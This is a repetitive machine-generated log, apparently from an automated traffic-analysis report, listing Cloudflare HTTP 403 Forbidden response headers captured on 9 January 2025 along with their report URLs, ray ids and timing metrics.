Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:36 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:51 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xZ6I267ydJ%2BJ00ptdnOzCeRsJz36Mm8G7Kiolwa7Ekrbc%2F2ZvkiHBDMQqYNDF5lYvwk8MjkZ1zy9bo5TB4RnDQDfQFr15JvLb0LlCTDDfsV%2Fq%2FZ8QIyRpkuRLndvmKp2z3p2k4V68NqsV%2F6F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4ca1e886a58-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2437&min_rtt=2434&rtt_var=920&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1185546&cwnd=235&unsent_bytes=0&cid=9b1fc0b728a374da&ts=147&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:52 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bA%2Bt4kDUO9A%2FhpZ8xTmYXfVwD%2FRIFppkvXsT5IhbpZD0v8zVXASw25eoIYnYFC%2FpykQOtl0zB2PiwVvYr2f3K6HQxG8PwgderQptzO7KU%2FKBliG0yBuMvPa4woNKkkiaQhXxpC%2B6N4KrbCUH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4cdeafe32d3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2083&min_rtt=2041&rtt_var=796&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1430671&cwnd=146&unsent_bytes=0&cid=6cf118b83cfc35df&ts=147&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:52 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iKRJM8OHvrtnkHvBGQVn8YDxBHN6U%2BWJk1qzNlwxZUwWw1gB54F2a8UZa8Hq0Lm%2FqCDL3N5jmWllrxf0dzJ%2BSKFMGsFBTJEaqPN%2B2EiJ0TsQmrxUUCPCKb8iITKiK0VS11FspY8qR%2F2QYS%2FY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4d1ba3f8c05-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2031&min_rtt=2028&rtt_var=767&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1421616&cwnd=215&unsent_bytes=0&cid=97b62ae14c0a1774&ts=139&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:53 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RBQ0aLxEJmOqTb00yzCpyITl%2F%2BSoJ0ac5FQaqjVphEePzyTZxFOkNcLT1Wj2xZ8X4QpWH%2F3XsvtK4N5K7jHpA6lYDNBAf0jTqQxMLBYxmckUYe73RTEFLK4UvkNj3LRmo0W7QBXpMPuopLgo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4d5aa168c4b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1983&min_rtt=1975&rtt_var=757&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1429970&cwnd=234&unsent_bytes=0&cid=f6b4079e50688f13&ts=153&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:53 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7NeuhvGlCBKJT0ODUr0IoPhE8FDPJGLnHymtx1qtjRZzvMBXinfDb%2F%2Fbc4kYKrEO05WjM52ygObnq0XfB7QDy0WQd6odYs5piiRXxxbMhMw3Y5FuzVUoYAfWfTyZ0vouiKjWNEj%2BE9coUMS8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4d9987c2361-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1939&min_rtt=1933&rtt_var=737&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1474003&cwnd=241&unsent_bytes=0&cid=8e367df5ee0a030c&ts=152&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:39 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:54 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=imbDew%2BlZyZGhMZzDTjjybROkSNzPIPLxsGafYro%2BxWc%2Fo6yPtIqzZo3%2ByvQK%2BmVZjMaxSTTWisUutOkCKY55ceEARhTtXJziAfDepljNmySPYxuQpdiWgN3MNjGTQINTamPJlZgKkc784Lk"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4dd5bd343bd-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1612&rtt_var=610&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1784841&cwnd=190&unsent_bytes=0&cid=cc522caa94d68800&ts=126&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:55 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l381HLGARZVIA6TfaWQk3w8ZfhChwziJxQxZlY9y%2FPU0RP49dLa5%2FSYitcxDkhMu32A4OMSrRv30bWftyc7iyxY4Dab0PQ5BBuUgSJgZUjwVUWTpNH76W7nBLnmFZUv97W11fclNMt%2F5%2BGuM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4e14f2d4261-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1627&min_rtt=1620&rtt_var=621&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1741204&cwnd=239&unsent_bytes=0&cid=c3bb00dac3e09e1a&ts=150&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:55 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=01VF%2FHWCbsvwuuUW8CGLRwv%2BlKaJV%2BcueEmiEvIyOy6cJydi81z4V%2FhouVQtnPXe5cOcRNc41pbvU6es3wPzWPVF6k3Xq6T%2BZ2WfmOlz5R8c%2FfnVUXWPmUZOAIOwXoaqgYFtqMXAFoDSfg6b"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4e53d2a43b0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1535&min_rtt=1526&rtt_var=591&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1823860&cwnd=252&unsent_bytes=0&cid=4d2766c82cac389b&ts=152&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:56 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hUy0WLRY%2FvNioACcwfAAempREFRyqBXbWmiPOi%2BgmIeKB%2B4j7Syq4%2BddMlKrFGe85lCt5SRz4htbc2Xem1hGnV2nYd%2BThjJ0eb63W75OmhEauMusOeuISm0QpwyOy2b99Vl%2BvqO8XFA7Vzfd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4e8fe8c8cb3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1970&min_rtt=1960&rtt_var=755&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1430671&cwnd=226&unsent_bytes=0&cid=ad87428f7831eafd&ts=130&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:57 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kAJB3OZeg0lPcobXuQn7fVhomfPazE1h9SxdJPEfRj%2Bs2QowLKcoNG7kL4T9ruqnaKgIxKCT9%2BBZYc%2BOVaXQFtUxoA7BKozBImsfF%2BmRy8wivQrRTjY%2B%2BlLjuHDSBF1N5U%2BYO9i3CQ%2F7rK0L"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4ecca8842f7-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2003&min_rtt=1996&rtt_var=763&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1421616&cwnd=179&unsent_bytes=0&cid=aeb701b2a0ae17a7&ts=145&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:57 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ndjO7JfK534HSaIH5AITuCysn9eM4mKeXWxnpZc9cYa3q2271GfRYEl8GRGHB%2BSDwgtk7zGN0%2BdplsYjRoM5y3Kc6RZehsibaZYTWjoyPEd2%2BaFLf4%2Ba%2BW56AaeathtgY9McNIKZyi%2BV%2FSQ9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4f0681b4240-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1629&rtt_var=624&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1737061&cwnd=243&unsent_bytes=0&cid=e5e7cbc0943bdd06&ts=123&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:58 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P3LNODTIvNvHQHktDMeWdz38%2Bjr5smejRANw6k0vDQNPuMYnYD%2Fa5zAWzOt2gcgIu4XhBjax7B%2FaRae%2F%2BSNOy70vdzl%2F21t7rvmYKZ4r8Qc%2F15uBLjB3Y2tAD6%2FQNNr2eT40MEuusG52wjpo"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4f40ae842b0-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1723&min_rtt=1717&rtt_var=656&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1654390&cwnd=233&unsent_bytes=0&cid=7cc7568639150d5c&ts=138&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:58 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RC6wJ05jGJNMfBeRvGXJgc1kNMYyS4OtWdeEi6i4e22pdexW05ljH%2F8P%2BfziJ4GOfEsMyGisWNxURhBt%2Bknhu2js%2F4LS0SKXtDnI5gFraRFAcVJdo%2Bx3F28JxlAjuikd2epc4Sx75NuhqxC3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4f7bdfc0f84-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1663&min_rtt=1623&rtt_var=688&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1502830&cwnd=244&unsent_bytes=0&cid=a853d00c80493862&ts=128&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:59 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MK8XAO1ITNiPlHoCubCnK0qBliyf%2BcFEFGsQcPQC4MP2GO%2BdTo3gM0t0DO2SDH24vDFtRvC4di%2BwJHwSpsAVHXahO9%2BY1KuRbuV1jP%2BUBGYOMJrmBsda0CwbD5dCKk6rkh86WKHRAAzUxyb0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4fb9bd1c360-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1508&min_rtt=1505&rtt_var=572&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1902280&cwnd=138&unsent_bytes=0&cid=1096f86df82f808e&ts=151&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:39:00 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4IpD26WYhnlUcAyAWivfSZ6eRkIBfbTqUDkaRGa74chiUOL4VJwS00%2FFj1Ws4tW6fBA4eNKEvqfb2QpqIZoTujzFTZ5VYk2KQNn3cXSxWOxSb%2BH4D86hWXZi0VylnN81N2qXWVIMxht0HCwp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4ff5d1441df-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2427&min_rtt=2426&rtt_var=912&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1197703&cwnd=252&unsent_bytes=0&cid=5fd0e48436d609f1&ts=132&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:39:00 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3rabn6SNtzG58cbzPj98YShj9tPZ6fNQNEAOC3%2B%2B1uX%2F2tKfoN%2FEqKmk2dl8fidOjhXAx4QKBwj4r2mW9hHZ5Y6Qq9FtqoX62FHZM0MJUnyeUuFiVoEqZlDzEu9TUJ9O0dBP8KNg9eOWWh8x"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c50348cd1902-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1612&min_rtt=1604&rtt_var=619&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1743283&cwnd=219&unsent_bytes=0&cid=440c67b0248bb29e&ts=147&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:39:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XzPAy8M1wAWMtwXo2MINMr1D36%2FWTmTzH5QOYzORraduFcH60y7FG2HIbj9pzXRbBeYSGv5knCGvC0ge%2FFL5UhZcQqRkBZPDgoBCkqDf32inLJ3aFnZQxkb3AruVrnoRGEDDWP%2BPGVBgKF9c"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c5070b81c352-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1483&min_rtt=1478&rtt_var=564&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1922317&cwnd=221&unsent_bytes=0&cid=132be7ba364ab12c&ts=145&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:39:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MjSH1Y0VcmoCYhq2JyzWDKqDnj%2F6LEGeltoNBe%2BYJkRtCCoMX5O6%2FB6RctAnI5F3HvJY4Pp9xrJ2afI%2BG2Jn52%2FzgMLprG2CNWMN7leAr15t7W4kc8PQJDFkolHHK1H2A4KKoKxBc2eqyQbm"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c50aaa18de92-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1661&min_rtt=1660&rtt_var=624&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1750599&cwnd=239&unsent_bytes=0&cid=6f536c4ec871b9fc&ts=133&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:39:02 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oh4jiK6D7k8o8k4tKVTjy7lQumjQUZK2ViMv1r9eYyNAhYtC1FbvYTFfS4LPuY9Oz5R774dMKj9qMvNXJM%2FG4QoUINbmRGkUcza9SndChFGp09z5cYCz2Izm42Y3abGHN7AuTtpXZsurp8Dg"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c50e49b643c8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1552&min_rtt=1545&rtt_var=594&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1819314&cwnd=192&unsent_bytes=0&cid=15b6ec762abbfd08&ts=122&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:39:03 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zqG8b3BJqocTS8Ab3Wzmbvmun92FjukGQH8mo2IY2fthFVfy%2BZBBHhsO7nEwUce9BVtV6V8JZDR9T%2BjBirlZZwKwEI5aNQJpwmUYZOQ5DxN%2FQV3EAIqTkM9dKzg%2F7n1wV0GR9HVDii12ptby"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c5121beb6a56-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2031&min_rtt=2031&rtt_var=762&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1437007&cwnd=224&unsent_bytes=0&cid=0413648a1286e4a6&ts=137&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:39:03 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LpLYqVJN7pvpk3rxQ%2F7Fdc8UpUnnqsq33MH%2BuPSMIPaGQ50tcWHqcb4n9DoFS%2BQd4%2BT5BDCNiiuWcMrH%2BXP31xEFUqirAEopx7Fl5tXm0KGQZQZWRIpNGVI6mebA9Jk7qcbbErKA9636SOfA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c515ce360f81-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1679&min_rtt=1677&rtt_var=634&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1720683&cwnd=241&unsent_bytes=0&cid=b2ba76bc38ebb315&ts=126&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:39:04 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yji%2F23JAZge8GqMQuat4wVEVGjuxoGZGEeHM4ZVtPI98X0ifqDipeeIT0zbqJ3RCpzOTPiPcupgKVFuy9mGYU20JjRwN%2BKYp1m5EJ7pM%2FOzf7WKIQcJn1flSSO1F%2F98S%2Bqu2jgc0fn7TcDQx"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c5199fd9330c-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2012&min_rtt=2008&rtt_var=762&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1426477&cwnd=190&unsent_bytes=0&cid=5015f92fa629fda5&ts=133&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:39:04 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5FbQyws0Wv9nBwGDTyAxIb6gmsndqFkDrgSdtb542Gp05gu8pVbsVOuoqGnP35kWXSjbHs4DhHD7gn1yiAEKQFrmMzfLBk1dpevKUQd9Pn6n5QcqZMCqiLEfCdwS29E1%2BxVMeWvlu%2FJHg%2BAa"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c51d6b5e4379-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1587&rtt_var=606&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1791411&cwnd=210&unsent_bytes=0&cid=51e240edbc13a57b&ts=136&x=0"
